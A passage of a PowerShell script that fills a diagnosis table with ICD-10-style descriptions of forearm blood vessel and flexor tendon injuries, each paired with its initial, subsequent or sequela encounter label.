$DiagnosisList.Rows.Add("Other specified injury of radial artery at forearm level, right arm","Other specified injury of radial artery at forearm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of radial artery at forearm level, left arm","Other specified injury of radial artery at forearm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of radial artery at forearm level, left arm","Other specified injury of radial artery at forearm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of radial artery at forearm level, left arm","Other specified injury of radial artery at forearm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of radial artery at forearm level, unspecified arm","Other specified injury of radial artery at forearm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of radial artery at forearm level, unspecified arm","Other specified injury of radial artery at forearm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of radial artery at forearm level, unspecified arm","Other specified injury of radial artery at forearm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of vein at forearm level, right arm","Unspecified injury of vein at forearm level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of vein at forearm level, right arm","Unspecified injury of vein at forearm level, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of vein at forearm level, right arm","Unspecified injury of vein at forearm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of vein at forearm level, left arm","Unspecified injury of vein at forearm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of vein at forearm level, left arm","Unspecified injury of vein at forearm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of vein at forearm level, left arm","Unspecified injury of vein at forearm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of vein at forearm level, unspecified arm","Unspecified injury of vein at forearm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of vein at forearm level, unspecified arm","Unspecified injury of vein at forearm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of vein at forearm level, unspecified arm","Unspecified injury of vein at forearm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of vein at forearm level, right arm","Laceration of vein at forearm level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of vein at forearm level, right arm","Laceration of vein at forearm level, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of vein at forearm level, right arm","Laceration of vein at forearm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of vein at forearm level, left arm","Laceration of vein at forearm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of vein at forearm level, left arm","Laceration of vein at forearm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of vein at forearm level, left arm","Laceration of vein at forearm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of vein at forearm level, unspecified arm","Laceration of vein at forearm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of vein at forearm level, unspecified arm","Laceration of vein at forearm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of vein at forearm level, unspecified arm","Laceration of vein at forearm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of vein at forearm level, right arm","Other specified injury of vein at forearm level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of vein at forearm level, right arm","Other specified injury of vein at forearm level, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of vein at forearm level, right arm","Other specified injury of vein at forearm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of vein at forearm level, left arm","Other specified injury of vein at forearm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of vein at forearm level, left arm","Other specified injury of vein at forearm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of vein at forearm level, left arm","Other specified injury of vein at forearm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of vein at forearm level, unspecified arm","Other specified injury of vein at forearm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of vein at forearm level, unspecified arm","Other specified injury of vein at forearm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of vein at forearm level, unspecified arm","Other specified injury of vein at forearm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other blood vessels at forearm level, right arm","Unspecified injury of other blood vessels at forearm level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other blood vessels at forearm level, right arm","Unspecified injury of other blood vessels at forearm level, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other blood vessels at forearm level, right arm","Unspecified injury of other blood vessels at forearm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other blood vessels at forearm level, left arm","Unspecified injury of other blood vessels at forearm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other blood vessels at forearm level, left arm","Unspecified injury of other blood vessels at forearm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other blood vessels at forearm level, left arm","Unspecified injury of other blood vessels at forearm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other blood vessels at forearm level, unspecified arm","Unspecified injury of other blood vessels at forearm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other blood vessels at forearm level, unspecified arm","Unspecified injury of other blood vessels at forearm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other blood vessels at forearm level, unspecified arm","Unspecified injury of other blood vessels at forearm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of other blood vessels at forearm level, right arm","Laceration of other blood vessels at forearm level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other blood vessels at forearm level, right arm","Laceration of other blood vessels at forearm level, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other blood vessels at forearm level, right arm","Laceration of other blood vessels at forearm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of other blood vessels at forearm level, left arm","Laceration of other blood vessels at forearm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other blood vessels at forearm level, left arm","Laceration of other blood vessels at forearm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other blood vessels at forearm level, left arm","Laceration of other blood vessels at forearm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of other blood vessels at forearm level, unspecified arm","Laceration of other blood vessels at forearm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other blood vessels at forearm level, unspecified arm","Laceration of other blood vessels at forearm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other blood vessels at forearm level, unspecified arm","Laceration of other blood vessels at forearm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of other blood vessels at forearm level, right arm","Other specified injury of other blood vessels at forearm level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of other blood vessels at forearm level, right arm","Other specified injury of other blood vessels at forearm level, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of other blood vessels at forearm level, right arm","Other specified injury of other blood vessels at forearm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of other blood vessels at forearm level, left arm","Other specified injury of other blood vessels at forearm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of other blood vessels at forearm level, left arm","Other specified injury of other blood vessels at forearm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of other blood vessels at forearm level, left arm","Other specified injury of other blood vessels at forearm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of other blood vessels at forearm level, unspecified arm","Other specified injury of other blood vessels at forearm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of other blood vessels at forearm level, unspecified arm","Other specified injury of other blood vessels at forearm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of other blood vessels at forearm level, unspecified arm","Other specified injury of other blood vessels at forearm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel at forearm level, right arm","Unspecified injury of unspecified blood vessel at forearm level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel at forearm level, right arm","Unspecified injury of unspecified blood vessel at forearm level, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel at forearm level, right arm","Unspecified injury of unspecified blood vessel at forearm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel at forearm level, left arm","Unspecified injury of unspecified blood vessel at forearm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel at forearm level, left arm","Unspecified injury of unspecified blood vessel at forearm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel at forearm level, left arm","Unspecified injury of unspecified blood vessel at forearm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel at forearm level, unspecified arm","Unspecified injury of unspecified blood vessel at forearm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel at forearm level, unspecified arm","Unspecified injury of unspecified blood vessel at forearm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel at forearm level, unspecified arm","Unspecified injury of unspecified blood vessel at forearm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified blood vessel at forearm level, right arm","Laceration of unspecified blood vessel at forearm level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified blood vessel at forearm level, right arm","Laceration of unspecified blood vessel at forearm level, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified blood vessel at forearm level, right arm","Laceration of unspecified blood vessel at forearm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified blood vessel at forearm level, left arm","Laceration of unspecified blood vessel at forearm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified blood vessel at forearm level, left arm","Laceration of unspecified blood vessel at forearm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified blood vessel at forearm level, left arm","Laceration of unspecified blood vessel at forearm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified blood vessel at forearm level, unspecified arm","Laceration of unspecified blood vessel at forearm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified blood vessel at forearm level, unspecified arm","Laceration of unspecified blood vessel at forearm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified blood vessel at forearm level, unspecified arm","Laceration of unspecified blood vessel at forearm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel at forearm level, right arm","Other specified injury of unspecified blood vessel at forearm level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel at forearm level, right arm","Other specified injury of unspecified blood vessel at forearm level, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel at forearm level, right arm","Other specified injury of unspecified blood vessel at forearm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel at forearm level, left arm","Other specified injury of unspecified blood vessel at forearm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel at forearm level, left arm","Other specified injury of unspecified blood vessel at forearm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel at forearm level, left arm","Other specified injury of unspecified blood vessel at forearm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel at forearm level, unspecified arm","Other specified injury of unspecified blood vessel at forearm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel at forearm level, unspecified arm","Other specified injury of unspecified blood vessel at forearm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel at forearm level, unspecified arm","Other specified injury of unspecified blood vessel at forearm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of right thumb at forearm level","Unspecified injury of flexor muscle, fascia and tendon of right thumb at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of right thumb at forearm level","Unspecified injury of flexor muscle, fascia and tendon of right thumb at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of right thumb at forearm level","Unspecified injury of flexor muscle, fascia and tendon of right thumb at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of left thumb at forearm level","Unspecified injury of flexor muscle, fascia and tendon of left thumb at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of left thumb at forearm level","Unspecified injury of flexor muscle, fascia and tendon of left thumb at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of left thumb at forearm level","Unspecified injury of flexor muscle, fascia and tendon of left thumb at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of unspecified thumb at forearm level","Unspecified injury of flexor muscle, fascia and tendon of unspecified thumb at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of unspecified thumb at forearm level","Unspecified injury of flexor muscle, fascia and tendon of unspecified thumb at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of unspecified thumb at forearm level","Unspecified injury of flexor muscle, fascia and tendon of unspecified thumb at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of right thumb at forearm level","Strain of flexor muscle, fascia and tendon of right thumb at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of right thumb at forearm level","Strain of flexor muscle, fascia and tendon of right thumb at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of right thumb at forearm level","Strain of flexor muscle, fascia and tendon of right thumb at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of left thumb at forearm level","Strain of flexor muscle, fascia and tendon of left thumb at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of left thumb at forearm level","Strain of flexor muscle, fascia and tendon of left thumb at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of left thumb at forearm level","Strain of flexor muscle, fascia and tendon of left thumb at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of unspecified thumb at forearm level","Strain of flexor muscle, fascia and tendon of unspecified thumb at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of unspecified thumb at forearm level","Strain of flexor muscle, fascia and tendon of unspecified thumb at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of unspecified thumb at forearm level","Strain of flexor muscle, fascia and tendon of unspecified thumb at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of right thumb at forearm level","Laceration of flexor muscle, fascia and tendon of right thumb at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of right thumb at forearm level","Laceration of flexor muscle, fascia and tendon of right thumb at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of right thumb at forearm level","Laceration of flexor muscle, fascia and tendon of right thumb at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of left thumb at forearm level","Laceration of flexor muscle, fascia and tendon of left thumb at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of left thumb at forearm level","Laceration of flexor muscle, fascia and tendon of left thumb at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of left thumb at forearm level","Laceration of flexor muscle, fascia and tendon of left thumb at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of unspecified thumb at forearm level","Laceration of flexor muscle, fascia and tendon of unspecified thumb at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of unspecified thumb at forearm level","Laceration of flexor muscle, fascia and tendon of unspecified thumb at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of unspecified thumb at forearm level","Laceration of flexor muscle, fascia and tendon of unspecified thumb at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of right thumb at forearm level","Other injury of flexor muscle, fascia and tendon of right thumb at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of right thumb at forearm level","Other injury of flexor muscle, fascia and tendon of right thumb at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of right thumb at forearm level","Other injury of flexor muscle, fascia and tendon of right thumb at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of left thumb at forearm level","Other injury of flexor muscle, fascia and tendon of left thumb at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of left thumb at forearm level","Other injury of flexor muscle, fascia and tendon of left thumb at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of left thumb at forearm level","Other injury of flexor muscle, fascia and tendon of left thumb at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of unspecified thumb at forearm level","Other injury of flexor muscle, fascia and tendon of unspecified thumb at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of unspecified thumb at forearm level","Other injury of flexor muscle, fascia and tendon of unspecified thumb at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of unspecified thumb at forearm level","Other injury of flexor muscle, fascia and tendon of unspecified thumb at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of right index finger at forearm level","Unspecified injury of flexor muscle, fascia and tendon of right index finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of right index finger at forearm level","Unspecified injury of flexor muscle, fascia and tendon of right index finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of right index finger at forearm level","Unspecified injury of flexor muscle, fascia and tendon of right index finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of left index finger at forearm level","Unspecified injury of flexor muscle, fascia and tendon of left index finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of left index finger at forearm level","Unspecified injury of flexor muscle, fascia and tendon of left index finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of left index finger at forearm level","Unspecified injury of flexor muscle, fascia and tendon of left index finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of right middle finger at forearm level","Unspecified injury of flexor muscle, fascia and tendon of right middle finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of right middle finger at forearm level","Unspecified injury of flexor muscle, fascia and tendon of right middle finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of right middle finger at forearm level","Unspecified injury of flexor muscle, fascia and tendon of right middle finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of left middle finger at forearm level","Unspecified injury of flexor muscle, fascia and tendon of left middle finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of left middle finger at forearm level","Unspecified injury of flexor muscle, fascia and tendon of left middle finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of left middle finger at forearm level","Unspecified injury of flexor muscle, fascia and tendon of left middle finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of right ring finger at forearm level","Unspecified injury of flexor muscle, fascia and tendon of right ring finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of right ring finger at forearm level","Unspecified injury of flexor muscle, fascia and tendon of right ring finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of right ring finger at forearm level","Unspecified injury of flexor muscle, fascia and tendon of right ring finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of left ring finger at forearm level","Unspecified injury of flexor muscle, fascia and tendon of left ring finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of left ring finger at forearm level","Unspecified injury of flexor muscle, fascia and tendon of left ring finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of left ring finger at forearm level","Unspecified injury of flexor muscle, fascia and tendon of left ring finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of right little finger at forearm level","Unspecified injury of flexor muscle, fascia and tendon of right little finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of right little finger at forearm level","Unspecified injury of flexor muscle, fascia and tendon of right little finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of right little finger at forearm level","Unspecified injury of flexor muscle, fascia and tendon of right little finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of left little finger at forearm level","Unspecified injury of flexor muscle, fascia and tendon of left little finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of left little finger at forearm level","Unspecified injury of flexor muscle, fascia and tendon of left little finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of left little finger at forearm level","Unspecified injury of flexor muscle, fascia and tendon of left little finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of unspecified finger at forearm level","Unspecified injury of flexor muscle, fascia and tendon of unspecified finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of unspecified finger at forearm level","Unspecified injury of flexor muscle, fascia and tendon of unspecified finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of unspecified finger at forearm level","Unspecified injury of flexor muscle, fascia and tendon of unspecified finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of right index finger at forearm level","Strain of flexor muscle, fascia and tendon of right index finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of right index finger at forearm level","Strain of flexor muscle, fascia and tendon of right index finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of right index finger at forearm level","Strain of flexor muscle, fascia and tendon of right index finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of left index finger at forearm level","Strain of flexor muscle, fascia and tendon of left index finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of left index finger at forearm level","Strain of flexor muscle, fascia and tendon of left index finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of left index finger at forearm level","Strain of flexor muscle, fascia and tendon of left index finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of right middle finger at forearm level","Strain of flexor muscle, fascia and tendon of right middle finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of right middle finger at forearm level","Strain of flexor muscle, fascia and tendon of right middle finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of right middle finger at forearm level","Strain of flexor muscle, fascia and tendon of right middle finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of left middle finger at forearm level","Strain of flexor muscle, fascia and tendon of left middle finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of left middle finger at forearm level","Strain of flexor muscle, fascia and tendon of left middle finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of left middle finger at forearm level","Strain of flexor muscle, fascia and tendon of left middle finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of right ring finger at forearm level","Strain of flexor muscle, fascia and tendon of right ring finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of right ring finger at forearm level","Strain of flexor muscle, fascia and tendon of right ring finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of right ring finger at forearm level","Strain of flexor muscle, fascia and tendon of right ring finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of left ring finger at forearm level","Strain of flexor muscle, fascia and tendon of left ring finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of left ring finger at forearm level","Strain of flexor muscle, fascia and tendon of left ring finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of left ring finger at forearm level","Strain of flexor muscle, fascia and tendon of left ring finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of right little finger at forearm level","Strain of flexor muscle, fascia and tendon of right little finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of right little finger at forearm level","Strain of flexor muscle, fascia and tendon of right little finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of right little finger at forearm level","Strain of flexor muscle, fascia and tendon of right little finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of left little finger at forearm level","Strain of flexor muscle, fascia and tendon of left little finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of left little finger at forearm level","Strain of flexor muscle, fascia and tendon of left little finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of left little finger at forearm level","Strain of flexor muscle, fascia and tendon of left little finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of finger of unspecified finger at forearm level","Strain of flexor muscle, fascia and tendon of finger of unspecified finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of finger of unspecified finger at forearm level","Strain of flexor muscle, fascia and tendon of finger of unspecified finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of finger of unspecified finger at forearm level","Strain of flexor muscle, fascia and tendon of finger of unspecified finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of right index finger at forearm level","Laceration of flexor muscle, fascia and tendon of right index finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of right index finger at forearm level","Laceration of flexor muscle, fascia and tendon of right index finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of right index finger at forearm level","Laceration of flexor muscle, fascia and tendon of right index finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of left index finger at forearm level","Laceration of flexor muscle, fascia and tendon of left index finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of left index finger at forearm level","Laceration of flexor muscle, fascia and tendon of left index finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of left index finger at forearm level","Laceration of flexor muscle, fascia and tendon of left index finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of right middle finger at forearm level","Laceration of flexor muscle, 